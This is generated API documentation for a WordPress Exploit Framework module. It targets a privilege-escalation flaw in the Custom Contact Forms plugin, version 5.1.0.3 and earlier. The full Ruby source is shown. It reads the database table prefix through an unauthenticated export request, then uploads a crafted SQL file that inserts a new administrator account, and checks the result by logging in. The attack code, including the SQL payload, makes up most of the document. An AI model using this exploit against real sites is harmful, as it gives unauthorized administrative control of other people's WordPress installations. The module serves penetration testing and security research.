Class: Wpxf::Auxiliary::CustomContactFormsPrivilegeEscalation

Inherits:

Module

• Object
• Module
• Wpxf::Auxiliary::CustomContactFormsPrivilegeEscalation

Includes:

Wpxf, WordPress::Login

Defined in:

lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

• #check ⇒ Object
• #hashed_password ⇒ Object
• #initialize ⇒ CustomContactFormsPrivilegeEscalation constructor

  A new instance of CustomContactFormsPrivilegeEscalation.

• #password ⇒ Object
• #payload_body_builder(prefix) ⇒ Object
• #run ⇒ Object
• #sql(prefix) ⇒ Object
• #sql_filename ⇒ Object
• #table_prefix ⇒ Object
• #username ⇒ Object

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ CustomContactFormsPrivilegeEscalation

Returns a new instance of CustomContactFormsPrivilegeEscalation.

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 7

def initialize
  super

  update_info(
    name: 'Custom Contact Forms Privilege Escalation',
    desc: 'The Custom Contact Forms plugin, up to and including version '\
          '5.1.0.3, allows unauthenticated users to create new admin users '\
          'due to lack of validation when uploading SQL files.',
    author: [
      'Marc-Alexandre Montpas', # Vulnerability discovery
      'rastating'               # WPXF module
    ],
    references: [
      ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
      ['URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail='],
      ['WPVDB', '7542']
    ],
    date: 'Aug 07 2014'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The username to register with',
      default: Utility::Text.rand_alpha(10)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to register with',
      default: Utility::Text.rand_alpha(rand(10..20))
    )
  ])
end

Instance Method Details

#check ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 53

def check
  check_plugin_version_from_readme('custom-contact-forms', '5.1.0.4')
end

#hashed_password ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 49

def hashed_password
  Utility::Text.md5(password)
end

#password ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 45

def password
  normalized_option_value('password')
end

#payload_body_builder(prefix) ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 82

def payload_body_builder(prefix)
  builder = Utility::BodyBuilder.new
  builder.add_file_from_string('import_file', sql(prefix), sql_filename)
  builder.add_field('ccf_merge_import', '1')
  builder
end

#run ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 89

def run
  return false unless super

  emit_info 'Extracting table prefix...'
  prefix = table_prefix
  if prefix.nil?
    emit_error 'Unable to determine table prefix'
    return false
  else
    emit_success "Found table prefix: #{prefix}", true
  end

  emit_info 'Creating new admin user...'
  res = nil
  payload_body_builder(prefix).create do |body|
    scoped_option_change('follow_http_redirection', false) do
      res = execute_post_request(url: wordpress_url_admin_post, body: body)
    end
  end

  if res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'
    emit_error 'Failed to create new user'
    emit_error "Code: #{res.code}", true
    emit_error "Location header: #{res.headers['Location']}", true
    return false
  end

  emit_info 'Verifying new account...'
  if wordpress_login(username, password)
    emit_success "User #{username} with password #{password} successfully created"
    return true
  else
    emit_error 'Failed to create new user'
    return false
  end
end

#sql(prefix) ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 71

def sql(prefix)
  <<-END_OF_SQL
    INSERT INTO #{prefix}users (user_login, user_pass) VALUES ('#{username}','#{hashed_password}');
    INSERT INTO #{prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{prefix}users where user_login='#{username}'),'#{prefix}capabilities','a:1:{s:13:"administrator";b:1;}'),((select id from #{prefix}users where user_login='#{username}'),'#{prefix}user_level','10');
  END_OF_SQL
end

#sql_filename ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 78

def sql_filename
  "#{Utility::Text.rand_alpha(5)}.sql"
end

#table_prefix ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 57

def table_prefix
  res = execute_post_request(
    url: wordpress_url_admin_post,
    body: {
      'ccf_export' => '1'
    }
  )

  return nil if res.code != 200 || res.body.nil? || res.body.empty?
  match = res.body.match(/insert into `(.+_)customcontactforms_fields`/i)
  return nil if match.nil? || match.length < 2
  match[1]
end

#username ⇒ Object

# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 41

def username
  normalized_option_value('username')
end